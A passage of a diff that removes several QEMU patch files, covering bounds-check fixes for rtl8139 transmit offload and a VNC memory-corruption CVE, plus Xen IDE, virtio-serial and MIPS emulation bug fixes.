- DPRINTF("+++ C+ mode TSO IP data len %d TCP hlen %d TCP "
- "data len %d TCP chunk size %d\n", ip_data_len,
- tcp_hlen, tcp_data_len, tcp_chunk_size);
+ /* ETH_MTU = ip header len + tcp header len + payload */
+ int tcp_data_len = ip_data_len - tcp_hlen;
+ int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
- /* note the cycle below overwrites IP header data,
- but restores it from saved_ip_header before sending packet */
+ DPRINTF("+++ C+ mode TSO IP data len %d TCP hlen %d TCP "
+ "data len %d TCP chunk size %d\n", ip_data_len,
+ tcp_hlen, tcp_data_len, tcp_chunk_size);
- int is_last_frame = 0;
+ /* note the cycle below overwrites IP header data,
+ but restores it from saved_ip_header before sending packet */
- for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
- {
- uint16_t chunk_size = tcp_chunk_size;
-
- /* check if this is the last frame */
- if (tcp_send_offset + tcp_chunk_size >= tcp_data_len)
- {
- is_last_frame = 1;
- chunk_size = tcp_data_len - tcp_send_offset;
- }
-
- DPRINTF("+++ C+ mode TSO TCP seqno %08x\n",
- be32_to_cpu(p_tcp_hdr->th_seq));
-
- /* add 4 TCP pseudoheader fields */
- /* copy IP source and destination fields */
- memcpy(data_to_checksum, saved_ip_header + 12, 8);
-
- DPRINTF("+++ C+ mode TSO calculating TCP checksum for "
- "packet with %d bytes data\n", tcp_hlen +
- chunk_size);
-
- if (tcp_send_offset)
- {
- memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
- }
-
- /* keep PUSH and FIN flags only for the last frame */
- if (!is_last_frame)
- {
- TCP_HEADER_CLEAR_FLAGS(p_tcp_hdr, TCP_FLAG_PUSH|TCP_FLAG_FIN);
- }
-
- /* recalculate TCP checksum */
- ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_tcpip_hdr->zeros = 0;
- p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
- p_tcpip_hdr->ip_payload = cpu_to_be16(tcp_hlen + chunk_size);
-
- p_tcp_hdr->th_sum = 0;
-
- int tcp_checksum = ip_checksum(data_to_checksum, tcp_hlen + chunk_size + 12);
- DPRINTF("+++ C+ mode TSO TCP checksum %04x\n",
- tcp_checksum);
-
- p_tcp_hdr->th_sum = tcp_checksum;
-
- /* restore IP header */
- memcpy(eth_payload_data, saved_ip_header, hlen);
-
- /* set IP data length and recalculate IP checksum */
- ip->ip_len = cpu_to_be16(hlen + tcp_hlen + chunk_size);
-
- /* increment IP id for subsequent frames */
- ip->ip_id = cpu_to_be16(tcp_send_offset/tcp_chunk_size + be16_to_cpu(ip->ip_id));
-
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(eth_payload_data, hlen);
- DPRINTF("+++ C+ mode TSO IP header len=%d "
- "checksum=%04x\n", hlen, ip->ip_sum);
-
- int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
- DPRINTF("+++ C+ mode TSO transferring packet size "
- "%d\n", tso_send_size);
- rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
- 0, (uint8_t *) dot1q_buffer);
-
- /* add transferred count to TCP sequence number */
- p_tcp_hdr->th_seq = cpu_to_be32(chunk_size + be32_to_cpu(p_tcp_hdr->th_seq));
- ++send_count;
- }
+ int is_last_frame = 0;
- /* Stop sending this frame */
- saved_size = 0;
- }
- else if (txdw0 & (CP_TX_TCPCS|CP_TX_UDPCS))
+ for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
- DPRINTF("+++ C+ mode need TCP or UDP checksum\n");
+ uint16_t chunk_size = tcp_chunk_size;
- /* maximum IP header length is 60 bytes */
- uint8_t saved_ip_header[60];
- memcpy(saved_ip_header, eth_payload_data, hlen);
+ /* check if this is the last frame */
+ if (tcp_send_offset + tcp_chunk_size >= tcp_data_len)
+ {
+ is_last_frame = 1;
+ chunk_size = tcp_data_len - tcp_send_offset;
+ }
- uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
- // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+ DPRINTF("+++ C+ mode TSO TCP seqno %08x\n",
+ be32_to_cpu(p_tcp_hdr->th_seq));
/* add 4 TCP pseudoheader fields */
/* copy IP source and destination fields */
memcpy(data_to_checksum, saved_ip_header + 12, 8);
- if ((txdw0 & CP_TX_TCPCS) && ip_protocol == IP_PROTO_TCP)
+ DPRINTF("+++ C+ mode TSO calculating TCP checksum for "
+ "packet with %d bytes data\n", tcp_hlen +
+ chunk_size);
+
+ if (tcp_send_offset)
{
- DPRINTF("+++ C+ mode calculating TCP checksum for "
- "packet with %d bytes data\n", ip_data_len);
+ memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
+ }
- ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_tcpip_hdr->zeros = 0;
- p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
- p_tcpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+ /* keep PUSH and FIN flags only for the last frame */
+ if (!is_last_frame)
+ {
+ TCP_HEADER_CLEAR_FLAGS(p_tcp_hdr, TCP_FLAG_PUSH|TCP_FLAG_FIN);
+ }
- tcp_header* p_tcp_hdr = (tcp_header *) (data_to_checksum+12);
+ /* recalculate TCP checksum */
+ ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_tcpip_hdr->zeros = 0;
+ p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
+ p_tcpip_hdr->ip_payload = cpu_to_be16(tcp_hlen + chunk_size);
- p_tcp_hdr->th_sum = 0;
+ p_tcp_hdr->th_sum = 0;
- int tcp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
- DPRINTF("+++ C+ mode TCP checksum %04x\n",
- tcp_checksum);
+ int tcp_checksum = ip_checksum(data_to_checksum, tcp_hlen + chunk_size + 12);
+ DPRINTF("+++ C+ mode TSO TCP checksum %04x\n",
+ tcp_checksum);
- p_tcp_hdr->th_sum = tcp_checksum;
- }
- else if ((txdw0 & CP_TX_UDPCS) && ip_protocol == IP_PROTO_UDP)
- {
- DPRINTF("+++ C+ mode calculating UDP checksum for "
- "packet with %d bytes data\n", ip_data_len);
+ p_tcp_hdr->th_sum = tcp_checksum;
- ip_pseudo_header *p_udpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_udpip_hdr->zeros = 0;
- p_udpip_hdr->ip_proto = IP_PROTO_UDP;
- p_udpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+ /* restore IP header */
+ memcpy(eth_payload_data, saved_ip_header, hlen);
- udp_header *p_udp_hdr = (udp_header *) (data_to_checksum+12);
+ /* set IP data length and recalculate IP checksum */
+ ip->ip_len = cpu_to_be16(hlen + tcp_hlen + chunk_size);
- p_udp_hdr->uh_sum = 0;
+ /* increment IP id for subsequent frames */
+ ip->ip_id = cpu_to_be16(tcp_send_offset/tcp_chunk_size + be16_to_cpu(ip->ip_id));
- int udp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
- DPRINTF("+++ C+ mode UDP checksum %04x\n",
- udp_checksum);
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(eth_payload_data, hlen);
+ DPRINTF("+++ C+ mode TSO IP header len=%d "
+ "checksum=%04x\n", hlen, ip->ip_sum);
- p_udp_hdr->uh_sum = udp_checksum;
- }
+ int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
+ DPRINTF("+++ C+ mode TSO transferring packet size "
+ "%d\n", tso_send_size);
+ rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
+ 0, (uint8_t *) dot1q_buffer);
- /* restore IP header */
- memcpy(eth_payload_data, saved_ip_header, hlen);
+ /* add transferred count to TCP sequence number */
+ p_tcp_hdr->th_seq = cpu_to_be32(chunk_size + be32_to_cpu(p_tcp_hdr->th_seq));
+ ++send_count;
}
+
+ /* Stop sending this frame */
+ saved_size = 0;
+ }
+ else if (txdw0 & (CP_TX_TCPCS|CP_TX_UDPCS))
+ {
+ DPRINTF("+++ C+ mode need TCP or UDP checksum\n");
+
+ /* maximum IP header length is 60 bytes */
+ uint8_t saved_ip_header[60];
+ memcpy(saved_ip_header, eth_payload_data, hlen);
+
+ uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
+ // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+
+ /* add 4 TCP pseudoheader fields */
+ /* copy IP source and destination fields */
+ memcpy(data_to_checksum, saved_ip_header + 12, 8);
+
+ if ((txdw0 & CP_TX_TCPCS) && ip_protocol == IP_PROTO_TCP)
+ {
+ DPRINTF("+++ C+ mode calculating TCP checksum for "
+ "packet with %d bytes data\n", ip_data_len);
+
+ ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_tcpip_hdr->zeros = 0;
+ p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
+ p_tcpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+
+ tcp_header* p_tcp_hdr = (tcp_header *) (data_to_checksum+12);
+
+ p_tcp_hdr->th_sum = 0;
+
+ int tcp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
+ DPRINTF("+++ C+ mode TCP checksum %04x\n",
+ tcp_checksum);
+
+ p_tcp_hdr->th_sum = tcp_checksum;
+ }
+ else if ((txdw0 & CP_TX_UDPCS) && ip_protocol == IP_PROTO_UDP)
+ {
+ DPRINTF("+++ C+ mode calculating UDP checksum for "
+ "packet with %d bytes data\n", ip_data_len);
+
+ ip_pseudo_header *p_udpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_udpip_hdr->zeros = 0;
+ p_udpip_hdr->ip_proto = IP_PROTO_UDP;
+ p_udpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+
+ udp_header *p_udp_hdr = (udp_header *) (data_to_checksum+12);
+
+ p_udp_hdr->uh_sum = 0;
+
+ int udp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
+ DPRINTF("+++ C+ mode UDP checksum %04x\n",
+ udp_checksum);
+
+ p_udp_hdr->uh_sum = udp_checksum;
+ }
+
+ /* restore IP header */
+ memcpy(eth_payload_data, saved_ip_header, hlen);
}
}
--
2.1.4


@ -1,39 +0,0 @@
From 043d28507ef7c5fdc34866f5e3b27a72bd0cd072 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:00 +0100
Subject: [PATCH 3/7] rtl8139: skip offload on short Ethernet/IP header
Transmit offload features access Ethernet and IP headers the packet. If
the packet is too short we must not attempt to access header fields:
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
...
eth_payload_data = saved_buffer + ETH_HLEN;
...
ip = (ip_header*)eth_payload_data;
if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 2f12d42..d377b6b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2164,6 +2164,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
DPRINTF("+++ C+ mode offloaded task checksum\n");
+ /* Large enough for Ethernet and IP headers? */
+ if (saved_size < ETH_HLEN + sizeof(ip_header)) {
+ goto skip_offload;
+ }
+
/* ip packet header */
ip_header *ip = NULL;
int hlen = 0;
--
2.1.4


@ -1,53 +0,0 @@
From 5a75d242fe019d05b46ef9bc330a6892525c84a7 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:01 +0100
Subject: [PATCH 4/7] rtl8139: check IP Header Length field
The IP Header Length field was only checked in the IP checksum case, but
is used in other cases too.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 19 ++++++++-----------
1 file changed, 8 insertions(+), 11 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index d377b6b..cd5ac05 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2200,6 +2200,10 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
hlen = IP_HEADER_LENGTH(ip);
+ if (hlen < sizeof(ip_header) || hlen > eth_payload_len) {
+ goto skip_offload;
+ }
+
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
@@ -2207,17 +2211,10 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
DPRINTF("+++ C+ mode need IP checksum\n");
- if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
- /* bad packet header len */
- /* or packet too short */
- }
- else
- {
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(ip, hlen);
- DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
- hlen, ip->ip_sum);
- }
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(ip, hlen);
+ DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
+ hlen, ip->ip_sum);
}
if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
--
2.1.4


@ -1,34 +0,0 @@
From 6c79ea275d72bc1fd88bdcf1e7d231b2c9c865de Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:02 +0100
Subject: [PATCH 5/7] rtl8139: check IP Total Length field
The IP Total Length field includes the IP header and data. Make sure it
is valid and does not exceed the Ethernet payload size.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index cd5ac05..ed2b23b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2205,7 +2205,12 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
ip_protocol = ip->ip_p;
- ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
+
+ ip_data_len = be16_to_cpu(ip->ip_len);
+ if (ip_data_len < hlen || ip_data_len > eth_payload_len) {
+ goto skip_offload;
+ }
+ ip_data_len -= hlen;
if (txdw0 & CP_TX_IPCS)
{
--
2.1.4


@ -1,35 +0,0 @@
From 30aa7be430e7c982e9163f3bcc745d3aa57b6aa4 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:03 +0100
Subject: [PATCH 6/7] rtl8139: skip offload on short TCP header
TCP Large Segment Offload accesses the TCP header in the packet. If the
packet is too short we must not attempt to access header fields:
tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index ed2b23b..c8f0df9 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2224,6 +2224,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
{
+ /* Large enough for the TCP header? */
+ if (ip_data_len < sizeof(tcp_header)) {
+ goto skip_offload;
+ }
+
int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
--
2.1.4


@ -1,32 +0,0 @@
From 9a084807bf6ca7c16d997a236d304111894a6539 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:04 +0100
Subject: [PATCH 7/7] rtl8139: check TCP Data Offset field
The TCP Data Offset field contains the length of the header. Make sure
it is valid and does not exceed the IP data length.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index c8f0df9..2df4a51 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2253,6 +2253,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
+ /* Invalid TCP data offset? */
+ if (tcp_hlen < sizeof(tcp_header) || tcp_hlen > ip_data_len) {
+ goto skip_offload;
+ }
+
/* ETH_MTU = ip header len + tcp header len + payload */
int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
--
2.1.4


@ -1,36 +0,0 @@
From: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
Fix release_drive on unplugged devices (pci_piix3_xen_ide_unplug)
pci_piix3_xen_ide_unplug should completely unhook the unplugged
IDEDevice from the corresponding BlockBackend, otherwise the next call
to release_drive will try to detach the drive again.
Suggested-by: Kevin Wolf <kwolf@redhat.com>
Signed-off-by: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
diff --git a/hw/ide/piix.c b/hw/ide/piix.c
index adb6649..5a26c86 100644
--- a/hw/ide/piix.c
+++ b/hw/ide/piix.c
@@ -169,6 +169,7 @@ int pci_piix3_xen_ide_unplug(DeviceState *dev)
PCIIDEState *pci_ide;
DriveInfo *di;
int i;
+ IDEDevice *idedev;
pci_ide = PCI_IDE(dev);
@@ -181,6 +182,12 @@ int pci_piix3_xen_ide_unplug(DeviceState *dev)
blk_detach_dev(blk, ds);
}
pci_ide->bus[di->bus].ifs[di->unit].blk = NULL;
+ if (!(i % 2)) {
+ idedev = pci_ide->bus[di->bus].master;
+ } else {
+ idedev = pci_ide->bus[di->bus].slave;
+ }
+ idedev->conf.blk = NULL;
blk_unref(blk);
}
}


@ -1,34 +0,0 @@
https://bugs.gentoo.org/557206
From 7882080388be5088e72c425b02223c02e6cb4295 Mon Sep 17 00:00:00 2001
From: "Michael S. Tsirkin" <mst@redhat.com>
Date: Thu, 23 Jul 2015 17:52:02 +0300
Subject: [PATCH] virtio-serial: fix ANY_LAYOUT
Don't assume a specific layout for control messages.
Required by virtio 1.
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Reviewed-by: Jason Wang <jasowang@redhat.com>
---
hw/char/virtio-serial-bus.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/char/virtio-serial-bus.c b/hw/char/virtio-serial-bus.c
index 78c73e5..929e49c 100644
--- a/hw/char/virtio-serial-bus.c
+++ b/hw/char/virtio-serial-bus.c
@@ -195,7 +195,8 @@ static size_t send_control_msg(VirtIOSerial *vser, void *buf, size_t len)
return 0;
}
- memcpy(elem.in_sg[0].iov_base, buf, len);
+ /* TODO: detect a buffer that's too short, set NEEDS_RESET */
+ iov_from_buf(elem.in_sg, elem.in_num, 0, buf, len);
virtqueue_push(vq, &elem, len);
virtio_notify(VIRTIO_DEVICE(vser), vq);
--
2.4.4


@ -1,78 +0,0 @@
From d54a299b83a07642c85a22bfe19b69ca4def9ec4 Mon Sep 17 00:00:00 2001
From: Leon Alrae <leon.alrae@imgtec.com>
Date: Wed, 9 Sep 2015 12:44:25 +0100
Subject: [PATCH] target-mips: correct MTC0 instruction on MIPS64
MTC0 on a 64-bit processor should move entire 64-bit GPR content to CP0
register.
Signed-off-by: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Aurelien Jarno <aurelien@aurel32.net>
---
target-mips/translate.c | 18 +++++++-----------
1 files changed, 7 insertions(+), 11 deletions(-)
diff --git a/target-mips/translate.c b/target-mips/translate.c
index 0883782..a59b670 100644
--- a/target-mips/translate.c
+++ b/target-mips/translate.c
@@ -4765,12 +4765,6 @@ static inline void gen_mtc0_store32 (TCGv arg, target_ulong off)
tcg_temp_free_i32(t0);
}
-static inline void gen_mtc0_store64 (TCGv arg, target_ulong off)
-{
- tcg_gen_ext32s_tl(arg, arg);
- tcg_gen_st_tl(arg, cpu_env, off);
-}
-
static void gen_mfhc0(DisasContext *ctx, TCGv arg, int reg, int sel)
{
const char *rn = "invalid";
@@ -5629,12 +5623,14 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
break;
case 5:
CP0_CHECK(ctx->insn_flags & ASE_MT);
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_VPESchedule));
+ tcg_gen_st_tl(arg, cpu_env,
+ offsetof(CPUMIPSState, CP0_VPESchedule));
rn = "VPESchedule";
break;
case 6:
CP0_CHECK(ctx->insn_flags & ASE_MT);
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_VPEScheFBack));
+ tcg_gen_st_tl(arg, cpu_env,
+ offsetof(CPUMIPSState, CP0_VPEScheFBack));
rn = "VPEScheFBack";
break;
case 7:
@@ -5884,7 +5880,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
case 14:
switch (sel) {
case 0:
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_EPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_EPC));
rn = "EPC";
break;
default:
@@ -6057,7 +6053,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
switch (sel) {
case 0:
/* EJTAG support */
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_DEPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_DEPC));
rn = "DEPC";
break;
default:
@@ -6160,7 +6156,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
case 30:
switch (sel) {
case 0:
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_ErrorEPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC));
rn = "ErrorEPC";
break;
default:
--
1.7.0.4


@ -1,44 +0,0 @@
From cdfcad788394ff53e317043e07b8e34f4987c659 Mon Sep 17 00:00:00 2001
From: Alex Smith <alex.smith@imgtec.com>
Date: Tue, 8 Sep 2015 11:34:11 +0100
Subject: [PATCH 1/1] target-mips: Fix RDHWR on CP0.Count
For RDHWR on the CP0.Count register, env->CP0_Count was being returned.
This value is a delta against the QEMU_CLOCK_VIRTUAL clock, not the
correct current value of CP0.Count. Use cpu_mips_get_count() instead.
Signed-off-by: Alex Smith <alex.smith@imgtec.com>
Cc: Aurelien Jarno <aurelien@aurel32.net>
Cc: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Aurelien Jarno <aurelien@aurel32.net>
Signed-off-by: Leon Alrae <leon.alrae@imgtec.com>
---
target-mips/op_helper.c | 9 +++++++--
1 files changed, 7 insertions(+), 2 deletions(-)
diff --git a/target-mips/op_helper.c b/target-mips/op_helper.c
index 1aa9e3c..94de108 100644
--- a/target-mips/op_helper.c
+++ b/target-mips/op_helper.c
@@ -2184,10 +2184,15 @@ target_ulong helper_rdhwr_synci_step(CPUMIPSState *env)
target_ulong helper_rdhwr_cc(CPUMIPSState *env)
{
if ((env->hflags & MIPS_HFLAG_CP0) ||
- (env->CP0_HWREna & (1 << 2)))
+ (env->CP0_HWREna & (1 << 2))) {
+#ifdef CONFIG_USER_ONLY
return env->CP0_Count;
- else
+#else
+ return (int32_t)cpu_mips_get_count(env);
+#endif
+ } else {
helper_raise_exception(env, EXCP_RI);
+ }
return 0;
}
--
1.7.0.4


@ -1,89 +0,0 @@
Pending upstream inclusion
Link: https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg03573.html
Patchwork: https://patchwork.ozlabs.org/patch/517392/
X-Gentoo-Bug: 563162
X-Gentoo-Bug-URL: https://bugs.gentoo.org/show_bug.cgi?id=563162
Signed-off-by: Markos Chandras <hwoarang@gentoo.org>
diff --git a/target-mips/cpu.c b/target-mips/cpu.c
index 4027d0f..144eea9 100644
--- a/target-mips/cpu.c
+++ b/target-mips/cpu.c
@@ -58,7 +58,9 @@ static bool mips_cpu_has_work(CPUState *cs)
check for interrupts that can be taken. */
if ((cs->interrupt_request & CPU_INTERRUPT_HARD) &&
cpu_mips_hw_interrupts_pending(env)) {
- has_work = true;
+ if (cpu_mips_hw_interrupts_enabled(env)) {
+ has_work = true;
+ }
}
/* MIPS-MT has the ability to halt the CPU. */
diff --git a/target-mips/cpu.h b/target-mips/cpu.h
index c91883d..210370e 100644
--- a/target-mips/cpu.h
+++ b/target-mips/cpu.h
@@ -639,23 +639,24 @@ static inline int cpu_mmu_index (CPUMIPSState *env)
return env->hflags & MIPS_HFLAG_KSU;
}
-static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
+static inline bool cpu_mips_hw_interrupts_enabled(CPUMIPSState *env)
{
- int32_t pending;
- int32_t status;
- int r;
-
- if (!(env->CP0_Status & (1 << CP0St_IE)) ||
- (env->CP0_Status & (1 << CP0St_EXL)) ||
- (env->CP0_Status & (1 << CP0St_ERL)) ||
+ return (env->CP0_Status & (1 << CP0St_IE)) &&
+ !(env->CP0_Status & (1 << CP0St_EXL)) &&
+ !(env->CP0_Status & (1 << CP0St_ERL)) &&
+ !(env->hflags & MIPS_HFLAG_DM) &&
/* Note that the TCStatus IXMT field is initialized to zero,
and only MT capable cores can set it to one. So we don't
need to check for MT capabilities here. */
- (env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)) ||
- (env->hflags & MIPS_HFLAG_DM)) {
- /* Interrupts are disabled */
- return 0;
- }
+ !(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT));
+}
+
+/* Check if there is pending and not masked out interrupt */
+static inline bool cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
+{
+ int32_t pending;
+ int32_t status;
+ bool r;
pending = env->CP0_Cause & CP0Ca_IP_mask;
status = env->CP0_Status & CP0Ca_IP_mask;
@@ -669,7 +670,7 @@ static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
/* A MIPS configured with compatibility or VInt (Vectored Interrupts)
treats the pending lines as individual interrupt lines, the status
lines are individual masks. */
- r = pending & status;
+ r = (pending & status) != 0;
}
return r;
}
diff --git a/target-mips/helper.c b/target-mips/helper.c
index 01c4461..2d86323 100644
--- a/target-mips/helper.c
+++ b/target-mips/helper.c
@@ -759,7 +759,8 @@ bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request)
MIPSCPU *cpu = MIPS_CPU(cs);
CPUMIPSState *env = &cpu->env;
- if (cpu_mips_hw_interrupts_pending(env)) {
+ if (cpu_mips_hw_interrupts_enabled(env) &&
+ cpu_mips_hw_interrupts_pending(env)) {
/* Raise it */
cs->exception_index = EXCP_EXT_INTERRUPT;
env->error_code = 0;


@ -1,29 +0,0 @@
Pending upstream inclusion
Link: https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg03572.html
Patchwork: https://patchwork.ozlabs.org/patch/517391/
X-Gentoo-Bug: 563162
X-Gentoo-Bug-URL: https://bugs.gentoo.org/show_bug.cgi?id=563162
Signed-off-by: Markos Chandras <hwoarang@gentoo.org>
diff --git a/target-mips/cpu.c b/target-mips/cpu.c
index 144eea9..cbeca04 100644
--- a/target-mips/cpu.c
+++ b/target-mips/cpu.c
@@ -53,12 +53,13 @@ static bool mips_cpu_has_work(CPUState *cs)
CPUMIPSState *env = &cpu->env;
bool has_work = false;
- /* It is implementation dependent if non-enabled interrupts
- wake-up the CPU, however most of the implementations only
+ /* Prior to MIPS Release 6 it is implementation dependent if non-enabled
+ interrupts wake-up the CPU, however most of the implementations only
check for interrupts that can be taken. */
if ((cs->interrupt_request & CPU_INTERRUPT_HARD) &&
cpu_mips_hw_interrupts_pending(env)) {
- if (cpu_mips_hw_interrupts_enabled(env)) {
+ if (cpu_mips_hw_interrupts_enabled(env) ||
+ (env->insn_flags & ISA_MIPS32R6)) {
has_work = true;
}
}


@ -1,86 +0,0 @@
https://bugs.gentoo.org/558416
fix from upstream git
From eb8934b0418b3b1d125edddc4fc334a54334a49b Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann <kraxel@redhat.com>
Date: Mon, 17 Aug 2015 19:56:53 +0200
Subject: [PATCH] vnc: fix memory corruption (CVE-2015-5225)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
The _cmp_bytes variable added by commit "bea60dd ui/vnc: fix potential
memory corruption issues" can become negative. Result is (possibly
exploitable) memory corruption. Reason for that is it uses the stride
instead of bytes per scanline to apply limits.
For the server surface is is actually fine. vnc creates that itself,
there is never any padding and thus scanline length always equals stride.
For the guest surface scanline length and stride are typically identical
too, but it doesn't has to be that way. So add and use a new variable
(guest_ll) for the guest scanline length. Also rename min_stride to
line_bytes to make more clear what it actually is. Finally sprinkle
in an assert() to make sure we never use a negative _cmp_bytes again.
Reported-by: 范祚至(库特) <zuozhi.fzz@alibaba-inc.com>
Reviewed-by: P J P <ppandit@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc.c | 15 ++++++++++-----
1 file changed, 10 insertions(+), 5 deletions(-)
diff --git a/ui/vnc.c b/ui/vnc.c
index e26973a..caf82f5 100644
--- a/ui/vnc.c
+++ b/ui/vnc.c
